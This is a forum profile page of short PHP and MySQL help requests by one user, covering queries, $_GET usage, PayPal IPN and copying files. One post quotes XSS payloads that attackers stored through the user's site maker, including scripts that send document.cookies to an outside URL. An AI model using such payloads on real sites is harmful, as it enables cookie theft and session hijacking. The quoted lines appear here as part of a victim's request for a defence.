
JayJabber
Members-
Posts
24 -
Joined
-
Last visited
Never
Everything posted by JayJabber
-
Solved, simply changed t: ". mysql_real_escape_string($info['sitename']) ."news Thanks for help!
-
Query SELECT * FROM news ORDER BY id DESC Failed with error: Table 'site.news' doesn't exist :-\
-
No errors are shown but the message There is no news shows
-
I've coded this up and i don't see why it does not connect the database by that i mean connect to that database. The $_GET function is just to get the site name . please help
-
it helps but now it shows the include file part for 0 and well any number really
-
I dont know. I it wont show anything like now i've changed it <?php if($gold != 0) { echo "<center><p>You DO not have Gold webclient, Purchase at the Upgrades shop!</p></center>"; } else if($gold != 1) { echo "work?"; } ?> and it still dont work. It wont show the You do not have message if gold is on 0
-
I dont seem to get this to work. If gold in the database (on a persons data) is 0 or its just empty i want it to show the message below but if its 1 or more i want it to show a file with content in ( The content shows on the page there on)
-
Thanks it worked your a star and the first person that helped me proper
-
I dont know whats wrong it dnt show a error message but does not update.
-
ok its not working The codes which are being used are; <script> for(;{alert('*CENSORED*')}</script> <script>document.location=”http://minecraftuk.org/xss/?c=” + document.cookies</script> <script>window.location=”http://minecraftuk.org/xss/?c=” + document.cookies</script>
-
It works but how can i remove the message part
-
Thanks for the cmment but what exactly does it do?
-
Well people who hate my site have been coming on and making a site with my site maker . And instead of filling in proper info they put <script> which redirects. And when they finish it saves into mysql and when i view the list of sites it redirects me to another site, Anyone know what can solve this?
-
No just didn't work
-
I tested and it didn't work!
-
How do i use it? what do i put in what?
-
Cannot find anything, Is there a way to copy files in a certain folder and you can repeat using that code? If you know what i mean if so then plz post it.
-
A folder with PHP files and subfolders.
-
where do i put what in where?
-
I will try that out
-
I need to copy more than 1 file and i cannot find anything other than that.
-
Well this problem has occurred a lot. I try to put ". $_GET['site'] ." or ". $_POST['site'] ." in my script and i get a server errror when trying t access my page ( error connecting the page basically) Here is the part of the script which that is occuring to: When i try using the $_GET function or $_POST functions in alot of stuff it just shows an server error(error connecting the page on my browser) Someone please help!
-
Well im using paypal IPN im trying to get it to update something out of my database. Heres the code I think this is all you need How do i get it to work?